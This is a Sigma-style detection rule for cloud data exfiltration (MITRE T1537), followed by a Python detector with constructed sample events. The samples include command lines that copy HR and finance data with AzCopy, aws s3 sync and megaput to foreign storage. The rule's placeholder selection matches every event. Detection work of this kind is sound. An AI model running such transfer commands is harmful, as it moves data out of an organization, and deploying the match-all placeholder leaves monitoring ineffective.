title: Transfer Data to Cloud Account (T1537)
id: df00tech-t1537
status: experimental
description: "Adversaries may exfiltrate data by transferring it to another cloud account they control on the same service. This technique abuses native cloud APIs, storage sharing mechanisms, and CLI tools (such as AzCopy, megatools, or the AWS CLI) to move data across cloud account boundaries while blending into normal cloud traffic. Detection is complicated because the traffic stays within the provider's internal network and may not trigger perimeter data loss controls. Common methods include: sharing VM disk snapshots or AMIs with attacker-controlled accounts, generating shared access signature (SAS) URIs or pre-signed S3 URLs for anonymous access, using AzCopy or AWS S3 sync to copy storage contents cross-account, and creating cloud instance backups and then exporting them to external subscriptions."
references:
  - https://attack.mitre.org/techniques/T1537/
  - https://df00tech.com/detections/T1537
author: df00tech
date: 2026/04/20
tags:
  - attack.t1537
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  # As written, the placeholder selection below (EventID: '*') matches every process_creation
  # event, so this rule must not be deployed until the selection has been filled in.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate cloud migration projects using AzCopy to transfer data between organizational Azure subscriptions owned by different teams or business units
  - Backup and disaster recovery tools that create and export VM snapshots to secondary Azure subscriptions or storage accounts as part of approved BCP/DR procedures
  - "DevOps pipelines and infrastructure-as-code workflows generating SAS tokens programmatically for legitimate cross-service data access (e.g., CI/CD artifact storage)"
  - Data engineering teams using Mega or other cloud storage services for approved data sharing with external partners or contractors
  - Azure Site Recovery and Azure Backup services that internally use snapshot APIs for replication to paired regions
level: high
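The cross-account transfer methods named in the description (AzCopy to a foreign storage account, `aws s3 sync`/`cp` to a foreign bucket, megatools uploads) can be checked against process_creation telemetry directly. The following is an added example and is not part of the df00tech rule or its KQL/SPL query; it assumes allowlists of organization-owned Azure storage accounts and S3 buckets, and the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Constructed allowlists (assumption): storage the organization owns; anything else is "foreign".
ORG_AZURE_ACCOUNTS = {"corpdata01", "corpbackups"}
ORG_S3_BUCKETS = {"corp-data-lake", "corp-backups"}
AZURE_STORAGE_RE = re.compile(r"https?://([a-z0-9]{3,24})\.(?:blob|dfs|file)\.core\.windows\.net/", re.I)
S3_URI_RE = re.compile(r"s3://([^/\s\"']+)")
AWS_TRANSFER_VERBS = {"cp", "sync", "mv"}

@dataclass
class Finding:
    rule: str
    image: str
    detail: str

def inspect_event(event: dict) -> list[Finding]:
    """Apply the T1537 heuristics from the rule description to one process_creation event."""
    image = event.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    tokens = cmd.lower().split()
    findings: list[Finding] = []
    if image == "azcopy.exe":
        # Every storage account named as source or destination must be one we own.
        for account in AZURE_STORAGE_RE.findall(cmd):
            if account.lower() not in ORG_AZURE_ACCOUNTS:
                findings.append(Finding("azcopy_foreign_storage_account", image, account.lower()))
    elif image == "aws.exe" and "s3" in tokens and AWS_TRANSFER_VERBS & set(tokens):
        # Only copy-like S3 verbs move data; "ls" and similar read-only verbs are ignored.
        for bucket in S3_URI_RE.findall(cmd):
            if bucket not in ORG_S3_BUCKETS:
                findings.append(Finding("aws_s3_transfer_foreign_bucket", image, bucket))
    elif image.startswith("mega"):
        # megatools binaries (megaput, megacopy, ...) upload straight to a consumer cloud service.
        findings.append(Finding("consumer_cloud_client", image, cmd))
    return findings

def scan(events: list[dict]) -> list[Finding]:
    """Run inspect_event over a batch of events and flatten the findings."""
    return [f for e in events for f in inspect_event(e)]

# Constructed sample process_creation events (not real telemetry); the SAS value is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\azcopy.exe", "CommandLine": 'azcopy.exe copy "https://corpdata01.blob.core.windows.net/hr/" "https://externalacct1.blob.core.windows.net/in/?sv=2022-11-02&sig=PLACEHOLDER" --recursive'},
    {"Image": r"C:\Tools\azcopy.exe", "CommandLine": 'azcopy.exe copy "https://corpdata01.blob.core.windows.net/hr/" "https://corpbackups.blob.core.windows.net/hr/" --recursive'},
    {"Image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe", "CommandLine": r"aws s3 sync C:\Data s3://unknown-bucket-7781/drop/"},
    {"Image": r"C:\Program Files\Amazon\AWSCLIV2\aws.exe", "CommandLine": "aws s3 ls s3://corp-data-lake/"},
    {"Image": r"C:\Tools\megatools\megaput.exe", "CommandLine": r"megaput.exe C:\Data\finance.zip"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]
```

The allowlist approach maps onto the listed false positives: approved migration and BCP/DR destinations belong in `ORG_AZURE_ACCOUNTS` and `ORG_S3_BUCKETS`, so only transfers to accounts nobody has vouched for surface as findings.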
